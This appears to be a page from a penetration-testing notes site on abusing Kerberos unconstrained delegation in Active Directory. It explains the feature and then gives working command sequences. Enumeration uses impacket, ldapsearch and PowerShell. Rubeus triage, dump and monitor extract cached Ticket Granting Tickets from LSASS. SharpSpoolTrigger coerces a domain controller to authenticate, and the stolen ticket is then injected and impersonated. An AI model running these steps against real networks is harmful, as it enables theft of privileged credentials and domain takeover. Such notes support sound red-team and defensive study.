Unconstrained Delegation

Unconstrained Delegation is a feature in the Kerberos authentication protocol that allows a service to request a Service Ticket for ANY service on behalf of a user.

The Trust this computer for delegation to any service (Kerberos only) privilege must be enabled in the Delegation tab within the object/computer's properties.

Attribute: userAccountControl -> TRUSTED_FOR_DELEGATION

When unconstrained delegation is enabled on a computer, the Key Distribution Center will include a copy of the user's Ticket Granting Ticket inside the Service Ticket. When a user authenticates to the target service using the Service Ticket, their Ticket Granting Ticket will be cached in memory on the computer hosting the service for future delegation use.

The goal is to identify and gain access to machines allowing unconstrained delegation in order to extract cached Ticket Granting Tickets that can be used to request a Service Ticket for any other service on behalf of the user.

Enumeration

GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.GitHub

Linux (Attacker)

findDelegation.py [domain]/[username]:[password]

The ldapsearch Command-Line Tooldocs.ldap.com

Linux (Attacker)

ldapsearch -x -H ldap://[DC FQDN] \
-D 'user@domain' -w 'Password' \
-b 'DC=domain,DC=local' \
'(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))' \
dNSHostName sAMAccountName

Get-ADComputer (ActiveDirectory)MicrosoftLearn

Windows (PowerShell)

Get-ADComputer "Account" -Properties TrustedForDelegation,TrustedToAuthForDelegation,msDS-AllowedToDelegateTo,PrincipalsAllowedToDelegateToAccount

Exploit

GitHub - GhostPack/Rubeus: Trying to tame the three-headed dog.GitHub

GitHub - S3cur3Th1sSh1t/SharpImpersonation: A User Impersonation tool - via Token or Shellcode injectionGitHub

Scenario

SQL$ has unconstrained delegation rights, and you have access to a host where the TGT of SQL$ is stored in memory.

The goal is to extract the TGT of a privileged user whose TGT was cached due to recent authentication to SQL$. We can then use the TGT of the privileged user to access any other service.

Windows (Target)

## Show Cached Tickets
Rubeus.exe triage

## Extract The TGT Using Its LUID (/nowrap To Make It Copy Friendly)
Rubeus.exe dump /luid:[luid of target tgt] /nowrap

## Create A Process And Inject The Dumped TGT
Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:weelee.zip /username:weelee /password:AnyPassword /ticket:[tgt]

## Use A Tool To Impersonate The Process Created Above
Invoke-SharpImpersonation -Command "pid:[pid]"

You must have elevated privileges on the target computer in order to dump TGTs from LSASS.

GitHub - cube0x0/SharpSystemTriggers: Collection of remote authentication triggers in C#GitHub

GitHub - GhostPack/Rubeus: Trying to tame the three-headed dog.GitHub

GitHub - S3cur3Th1sSh1t/SharpImpersonation: A User Impersonation tool - via Token or Shellcode injectionGitHub

Windows (Target)

## Monitor And Extract New TGTs As They Get Cached In The Local Computer
Rubeus.exe monitor /interval:10 /nowrap /runfor:60

## Force Authentication From Target (dc) To Listener (service)
SharpSpoolTrigger.exe dc.weelee.zip service.weelee.zip

## Create A Process And Inject The Dumped TGT
Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:weelee.zip /username:weelee /password:AnyPassword /ticket:[tgt]

## Use A Tool To Impersonate The Process Created Above
Invoke-SharpImpersonation -Command "pid:[pid]"

You must have elevated privileges on the listener (in this case service.weelee.zip) in order to monitor for new cached Kerberos Tickets on it.

PreviousKerberos Delegation NextUnconstrained Delegation (User)

Last updated 12 days ago

hashtagEnumeration

hashtagExploit

hashtagScenario

Enumeration

Exploit

Scenario